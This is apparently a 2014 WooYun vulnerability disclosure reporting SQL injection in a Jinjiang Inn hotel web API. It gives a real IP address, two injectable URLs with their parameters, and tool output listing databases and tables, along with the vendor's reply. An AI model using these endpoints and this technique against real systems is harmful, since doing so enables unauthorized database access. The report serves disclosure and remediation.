漏洞详情

披露状态:

2014-03-13: 细节已通知厂商并且等待厂商处理中
2014-03-13: 厂商已经确认,细节仅向厂商公开
2014-03-23: 细节向核心白帽子及相关领域专家公开
2014-04-02: 细节向普通白帽子公开
2014-04-12: 细节向实习白帽子公开
2014-04-27: 细节向公众公开

简要描述:

0.0

详细说明:

锦江之星

SQL注入 设计大量数据库 信息等:

点:

http://220.196.57.147:8080/GetUnit.aspx?RmtpId=0002&service=api_getUnitRmtp&UnitId=0705

参数:RmtpId

0.png



1.png



2.png



3.png





如图: 85个表

4.png





会涉及大量用户信息 仅演示 不深入

漏洞证明:

上一个漏洞参数是:RmtpId 没想到还有一个 o(╯□╰)o



这个点:

http://220.196.57.147:8080/GetUnit.aspx?City=3100&service=api_gethotellist

参数:City



available databases [11]:
[*] CRMDB
[*] DataSwitch
[*] HonorAndJinjiang
[*] InterfaceDB
[*] JJWEB
[*] JJWEB_20131025
[*] master
[*] model
[*] msdb
[*] tempdb
[*] WebReport

Database: JJWEB
[85 tables]
+---------------------------------+
| dbo.Activity |
| dbo.ActivityInfo |
| dbo.CDS_UnitRmTp |
| dbo.DN_CodeDescript |
| dbo.DN_District |
| dbo.DN_Unit |
| dbo.DN_Unit_Old |
| dbo.HT_CRSRmTp |
| dbo.HT_PayAccountInnHotel |
| dbo.HT_ResvApp |
| dbo.HT_UnitInfo |
| dbo.HT_UnitPosition |
| dbo.HT_UnitRmTp |
| dbo.JW_Apply |
| dbo.JW_ApplytoJoin |
| dbo.JW_BrandInfo |
| dbo.JW_BrandInfoCate |
| dbo.JW_Bus_XZ |
| dbo.JW_Bus_XZ_Hotels |
| dbo.JW_Channels |
| dbo.JW_ChefInfo |
| dbo.JW_ChefInfoCate |
| dbo.JW_CityInfo |
| dbo.JW_CityPIOData |
| dbo.JW_Collect |
| dbo.JW_CompanyLink |
| dbo.JW_CompanyLinkClass |
| dbo.JW_CountryList |
| dbo.JW_Department |
| dbo.JW_DiTieXianLu |
| dbo.JW_District |
| dbo.JW_DownLoad |
| dbo.JW_Education |
| dbo.JW_FormService |
| dbo.JW_Guest_Consultation |
| dbo.JW_Guest_HotelComment |
| dbo.JW_HotelComment |
| dbo.JW_HotelPhoto |
| dbo.JW_HotelPhotoNew |
| dbo.JW_InfoPicture |
| dbo.JW_InnHotel_NearInfo |
| dbo.JW_JobCate |
| dbo.JW_JobPosition |
| dbo.JW_LinkCate |
| dbo.JW_Links |
| dbo.JW_MsgStatus |
| dbo.JW_NewsWeiXin |
| dbo.JW_OftenOrderHotel |
| dbo.JW_OftenOrderUser |
| dbo.JW_OperationType |
| dbo.JW_OrderBuyCard |
| dbo.JW_PhoneRecharge |
| dbo.JW_ProInfo |
| dbo.JW_ProInfoCate |
| dbo.JW_RecType |
| dbo.JW_ScoreClass |
| dbo.JW_ScoreTrans |
| dbo.JW_ServiceList |
| dbo.JW_SiteMsg |
| dbo.JW_SpecOffs |
| dbo.JW_SpecOffsCate |
| dbo.JW_SpecOffsType |
| dbo.JW_SpecialCity |
| dbo.JW_StatisticsClass |
| dbo.JW_TuiJian |
| dbo.JW_Unit360Flash |
| dbo.JW_UnitMinPrice |
| dbo.JW_UnitToDayPrice |
| dbo.JW_UploadFile |
| dbo.JW_UserMsgSite |
| dbo.JW_UserQPlus |
| dbo.JW_WeiXinResv |
| dbo.JW_qykh |
| dbo.MSreplication_objects |
| dbo.MSreplication_subscriptions |
| dbo.MSsubscription_agents |
| dbo.Table_1 |
| dbo.Test |
| dbo.Test_trace |
| dbo.VistData |
| dbo.sysdiagrams |
| dbo.v_DN_UnitInfo |
| dbo.v_SpecOffs_Info |
| dbo.v_dnunit_htunitinfo |
| dbo.v_hotellist |
+---------------------------------+





涉及 CRMDB、InterfaceD、JJWEB、JJWEB_20131025 数据库 影响可想而知

0.png





ok 不深入。

修复方案:

过滤参数:RmtpId

版权声明:转载请注明来源 爱上平顶山@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-03-13 14:45

厂商回复:

这是我公司测试用系统,其中数据做过处理。

最新状态:

暂无


漏洞评价: